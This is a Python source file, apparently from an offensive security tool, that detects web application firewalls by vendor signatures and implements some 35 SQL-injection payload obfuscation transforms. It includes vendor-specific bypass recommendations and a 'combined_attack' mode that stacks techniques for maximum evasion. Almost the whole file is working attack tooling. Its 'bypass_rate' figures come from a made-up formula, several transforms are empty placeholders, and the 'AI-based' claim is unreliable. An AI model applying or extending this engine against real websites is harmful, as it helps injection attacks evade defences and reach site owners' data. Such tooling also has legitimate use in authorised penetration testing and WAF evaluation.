"""
Advanced Tamper Engine for WAF bypass and payload obfuscation
Supports 30+ evasion techniques with AI-based WAF fingerprinting
"""

import random
import re
import string
import base64
from typing import Dict, List, Optional, Callable
from dataclasses import dataclass


@dataclass
class TamperResult:
    name: str
    payload: str
    bypass_rate: float
    waf_compat: List[str]
    latency: float


class WAFDetector:
    def __init__(self):
        self.waf_signatures = {
            "Cloudflare": [
                "__cfduid", "cf-ray", "cloudflare-nginx", "CF-Ray",
                "server: cloudflare"
            ],
            "CloudFront": [
                "x-amz-cf-id", "x-amz-cf-pop", "cloudfront"
            ],
            "Akamai": [
                "akamai", "X-Akamai-", "AkamaiGHost"
            ],
            "ModSecurity": [
                "ModSecurity", "NOYB", "This error was generated by Mod_Security"
            ],
            "AWS WAF": [
                "x-amzn-RequestId", "AWS WAF", "x-amzn-waf"
            ],
            "F5 BIG-IP": [
                "BIG-IP", "F5", "TSessionID"
            ],
            "Sucuri": [
                "Sucuri", "X-Sucuri-ID", "sucuri.net"
            ],
            "Imperva": [
                "Incapsula", "X-Iinfo", "imperva"
            ],
            "Barracuda": [
                "Barracuda", "barracuda.net"
            ],
            "Wordfence": [
                "Wordfence", "Generated by Wordfence"
            ],
            "Comodo WAF": [
                "Protected by COMODO WAF"
            ],
            "StackPath": [
                "stackpath", "StackPath"
            ],
            "Varnish": [
                "X-Varnish", "varnish"
            ],
            "Fortinet": [
                "FortiWeb", "Fortinet"
            ],
            "Citrix": [
                "NS-", "citrix"
            ],
            "Radware": [
                "Radware", "X-RW-"
            ],
            "SafeDog": [
                "Safedog", "SafeDog"
            ],
            "Yundun": [
                "YUNDUN", "yundun"
            ],
            "KnownSec": [
                "KS-WAF", "knownsec"
            ],
            "Alibaba Cloud": [
                "AliYun", "aliyun"
            ],
            "Baidu": [
                "YunJing", "baidu"
            ],
            "Huawei": [
                "HuaweiCloud", "Huawei"
            ],
            "Tencent": [
                "TX-WAF", "tencent"
            ],
            "QiAnXin": [
                "360WAF", "360websec"
            ],
            "NSFocus": [
                "NSFocus", "Nsfocus"
            ],
            "LetSDefend": [
                "LetSDefend"
            ],
            "ExpressionEngine": [
                "ExpressionEngine"
            ],
        }

    def detect(self, headers: Dict[str, str], body: str) -> List[Dict]:
        """Detect WAF from response headers and body"""
        findings = []
        combined = ""

        if headers:
            for k, v in headers.items():
                combined += f"{k.lower()}: {v.lower()} "
        if body:
            combined += body.lower()[:5000]

        for waf_name, signatures in self.waf_signatures.items():
            match_count = 0
            for sig in signatures:
                if sig.lower() in combined:
                    match_count += 1

            if match_count > 0:
                confidence = min(match_count / len(signatures) * 100, 100)
                findings.append({
                    "waf": waf_name, "confidence": confidence,
                    "matches": match_count, "total": len(signatures)
                })

        findings.sort(key=lambda x: x["confidence"], reverse=True)
        return findings

    def get_bypass_strategy(self, waf_name: str) -> str:
        """Get recommended bypass strategy for specific WAF"""
        strategies = {
            "Cloudflare": "space2comment",
            "ModSecurity": "unicode_encoding",
            "AWS WAF": "case_swapping",
            "F5 BIG-IP": "comment_between",
            "Imperva": "hex_encoding",
            "Sucuri": "double_url",
            "Akamai": "inline_comment",
        }
        return strategies.get(waf_name, "combined")


class TamperEngine:
    def __init__(self, waf: str = None):
        self.waf = waf
        self.tampers: Dict[str, Callable] = {}
        self._register_tampers()

    def _register_tampers(self):
        self.tampers = {
            "space2comment": self.space_to_comment,
            "space2dash": self.space_to_dash,
            "space2plus": self.space_to_plus,
            "space2newline": self.space_to_newline,
            "space2tab": self.space_to_tab,
            "space2mysqlcomment": self.space_to_mysql_comment,
            "space2mssqlcomment": self.space_to_mssql_comment,
            "equality2like": self.equality_to_like,
            "equality2notlike": self.equality_to_not_like,
            "equality2rlike": self.equality_to_rlike,
            "equality2regexp": self.equality_to_regexp,
            "greatest2max": self.greatest_to_max,
            "str2hex": self.string_to_hex,
            "str2char": self.string_to_char_function,
            "str2concat": self.string_to_concat,
            "case_swapping": self.case_swapping,
            "comment_between": self.comment_between_tokens,
            "unicode_encoding": self.unicode_encode,
            "double_url_encoding": self.double_url_encode,
            "hex_encoding": self.hex_encode_strings,
            "base64_encoding": self.base64_encode,
            "and2or": self.and_to_or,
            "or2and": self.or_to_and,
            "operator_swapping": self.operator_swap,
            "comment_removal": self.comment_removal,
            "versioned_mysql": self.versioned_mysql_comment,
            "versioned_mssql": self.versioned_mssql_comment,
            "null_byte": self.null_byte_injection,
            "newline_injection": self.newline_injection,
            "parameter_fragmentation": self.parameter_fragmentation,
            "http_param_pollution": self.http_parameter_pollution,
            "multipart_encoding": self.multipart_encoding,
            "chunked_encoding": self.chunked_encoding,
            "query_string_bypass": self.query_string_bypass,
            "case_insensitive_bypass": self.case_insensitive_bypass,
            "overlong_utf8": self.overlong_utf8_encoding,
        }

    def apply(self, payload: str, tamper_names: List[str] = None) -> TamperResult:
        """Apply tamper techniques to payload"""
        if not tamper_names:
            tamper_names = self._recommend_tampers()

        result = payload
        for name in tamper_names:
            if name in self.tampers:
                result = self.tampers[name](result)

        return TamperResult(
            name="+".join(tamper_names),
            payload=result,
            bypass_rate=self._estimate_bypass_rate(tamper_names),
            waf_compat=self._get_waf_compat(tamper_names),
            latency=len(tamper_names) * 0.5
        )

    def apply_all(self, payload: str) -> List[TamperResult]:
        """Apply each tamper individually and return results"""
        results = []
        for name, func in self.tampers.items():
            try:
                modified = func(payload)
                if modified != payload:
                    results.append(TamperResult(
                        name=name, payload=modified,
                        bypass_rate=self._estimate_bypass_rate([name]),
                        waf_compat=self._get_waf_compat([name]),
                        latency=0.3
                    ))
            except Exception:
                continue
        return results

    def _recommend_tampers(self) -> List[str]:
        """Recommend tamper sequence based on detected WAF"""
        strategy_map = {
            "Cloudflare": ["space2comment", "comment_between", "case_swapping"],
            "ModSecurity": ["unicode_encoding", "comment_between", "str2hex"],
            "AWS WAF": ["case_swapping", "equality2like", "space2comment"],
            "F5 BIG-IP": ["comment_between", "str2concat", "newline_injection"],
            "Imperva": ["hex_encoding", "double_url_encoding", "null_byte"],
            "Sucuri": ["double_url_encoding", "str2char", "space2tab"],
            "Akamai": ["comment_between", "versioned_mysql", "space2comment"],
        }
        if self.waf:
            return strategy_map.get(self.waf, ["comment_between", "case_swapping", "space2comment"])
        return ["comment_between", "case_swapping", "space2comment"]

    def _estimate_bypass_rate(self, tampers: List[str]) -> float:
        """Estimate bypass rate for tamper combination"""
        base = 0.3
        for _ in tampers:
            base = base + (1 - base) * 0.2
        return min(base, 0.95)

    def _get_waf_compat(self, tampers: List[str]) -> List[str]:
        """Get WAF compatibility list"""
        compat_map = {
            "space2comment": ["Cloudflare", "AWS WAF"],
            "case_swapping": ["AWS WAF", "ModSecurity"],
            "comment_between": ["Cloudflare", "F5 BIG-IP"],
            "unicode_encoding": ["ModSecurity"],
            "hex_encoding": ["Imperva"],
            "double_url_encoding": ["Sucuri"],
        }
        compat = set()
        for t in tampers:
            if t in compat_map:
                compat.update(compat_map[t])
        return list(compat)

    # --- Tamper implementations ---

    def space_to_comment(self, payload: str) -> str:
        return re.sub(r"\s+", "/**/", payload)

    def space_to_dash(self, payload: str) -> str:
        return re.sub(r"\s+", "-", payload)

    def space_to_plus(self, payload: str) -> str:
        return re.sub(r"\s+", "+", payload)

    def space_to_newline(self, payload: str) -> str:
        return re.sub(r"\s+", "%0a", payload)

    def space_to_tab(self, payload: str) -> str:
        return re.sub(r"\s+", "%09", payload)

    def space_to_mysql_comment(self, payload: str) -> str:
        return re.sub(r"\s+(?=[(,])", "/**/", re.sub(r"(?<=[=(])\s+", "/**/", payload))

    def space_to_mssql_comment(self, payload: str) -> str:
        return re.sub(r"\s+(?=[(,])", "/**/", re.sub(r"(?<=[=(])\s+", "/**/", payload))

    def equality_to_like(self, payload: str) -> str:
        return re.sub(r"(?<!=)=(?!=)", " LIKE ", payload)

    def equality_to_not_like(self, payload: str) -> str:
        return re.sub(r"(?<!=)!=(?!=)|(?<!=)<>", " NOT LIKE ", payload)

    def equality_to_rlike(self, payload: str) -> str:
        return re.sub(r"(?<!=)=(?!=)", " RLIKE ", payload)

    def equality_to_regexp(self, payload: str) -> str:
        return re.sub(r"(?<!=)=(?!=)", " REGEXP ", payload)

    def greatest_to_max(self, payload: str) -> str:
        return payload.replace("GREATEST", "MAX").replace("greatest", "max")

    def string_to_hex(self, payload: str) -> str:
        def replace_str(m):
            s = m.group(1)
            return "0x" + s.encode().hex()
        return re.sub(r"'([^']*)'", replace_str, payload)

    def string_to_char_function(self, payload: str) -> str:
        def replace_str(m):
            s = m.group(1)
            return "CHAR(" + ",".join(str(ord(c)) for c in s) + ")"
        return re.sub(r"'([^']*)'", replace_str, payload)

    def string_to_concat(self, payload: str) -> str:
        parts = payload.split("'")
        result = []
        for i, p in enumerate(parts):
            if i % 2 == 1:
                half = len(p) // 2
                if half > 0:
                    result.append(f"CONCAT('{p[:half]}','{p[half:]}')")
                else:
                    result.append(f"'{p}'")
            else:
                result.append(p)
        return "".join(result)

    def case_swapping(self, payload: str) -> str:
        return "".join(
            c.upper() if random.random() > 0.5 else c.lower()
            if c.isalpha() else c for c in payload
        )

    def comment_between_tokens(self, payload: str) -> str:
        tokens = re.split(r"([\s,()=<>!+\-*/;])", payload)
        result = []
        for token in tokens:
            if re.match(r"[\w@]+", token) and random.random() > 0.4:
                result.append(f"/**/{token}/**/")
            else:
                result.append(token)
        return "".join(result)

    def unicode_encode(self, payload: str) -> str:
        return "".join(
            f"%u{ord(c):04x}" if random.random() > 0.7 else c for c in payload
        )

    def double_url_encode(self, payload: str) -> str:
        return "".join(f"%25{ord(c):02x}" if random.random() > 0.6 else c for c in payload)

    def hex_encode_strings(self, payload: str) -> str:
        def replace_str(m):
            s = m.group(1)
            return "0x" + "".join(f"{ord(c):02x}" for c in s)
        return re.sub(r"'([^']*)'", replace_str, payload)

    def base64_encode(self, payload: str) -> str:
        return base64.b64encode(payload.encode()).decode()

    def and_to_or(self, payload: str) -> str:
        return re.sub(r"\bAND\b", "OR", payload, flags=re.I)

    def or_to_and(self, payload: str) -> str:
        return re.sub(r"\bOR\b", "AND", payload, flags=re.I)

    def operator_swap(self, payload: str) -> str:
        ops = {"=": "!=", "!=": "=", "<>": "=", ">": "<", "<": ">", ">=": "<=", "<=": ">="}
        for old, new in ops.items():
            payload = payload.replace(old, new)
        return payload

    def comment_removal(self, payload: str) -> str:
        return re.sub(r"/\*.*?\*/", "", payload, flags=re.DOTALL)

    def versioned_mysql_comment(self, payload: str) -> str:
        return re.sub(r"\b(SELECT|UNION|FROM|WHERE|AND|OR|ORDER|BY|LIMIT|INTO|VALUES|INSERT|UPDATE|DELETE)\b",
                      r"/*!\1*/", payload, flags=re.I)

    def versioned_mssql_comment(self, payload: str) -> str:
        return re.sub(r"\b(SELECT|UNION|FROM|WHERE|AND|OR|ORDER|BY)\b",
                      r"/*\1*/", payload, flags=re.I)

    def null_byte_injection(self, payload: str) -> str:
        return "%00" + payload

    def newline_injection(self, payload: str) -> str:
        return payload.replace(" ", "%0a")

    def parameter_fragmentation(self, payload: str) -> str:
        return payload.replace(" ", "/*/")

    def http_parameter_pollution(self, payload: str) -> str:
        return payload.replace("=", "=1&foo=")  # Simple HPP

    def multipart_encoding(self, payload: str) -> str:
        return payload  # Placeholder

    def chunked_encoding(self, payload: str) -> str:
        return payload  # Placeholder

    def query_string_bypass(self, payload: str) -> str:
        return payload.replace("'", "%27").replace('"', "%22").replace("=", "%3D")

    def case_insensitive_bypass(self, payload: str) -> str:
        return payload  # Placeholder

    def overlong_utf8_encoding(self, payload: str) -> str:
        def overlong(c):
            if ord(c) < 128:
                return chr(0xC0 | (ord(c) >> 6)) + chr(0x80 | (ord(c) & 0x3F))
            return c
        return "".join(overlong(c) if random.random() > 0.85 and ord(c) < 128 else c for c in payload)

    def combined_attack(self, payload: str, level: int = 3) -> str:
        """Apply multiple tamper levels for maximum evasion"""
        levels = [
            ["comment_between", "case_swapping"],
            ["comment_between", "case_swapping", "space2comment", "str2char"],
            ["comment_between", "case_swapping", "space2comment", "str2char", "hex_encoding", "null_byte"],
        ]
        idx = min(level - 1, len(levels) - 1)
        result = payload
        for tamper in levels[idx]:
            if tamper in self.tampers:
                result = self.tampers[tamper](result)
        return result
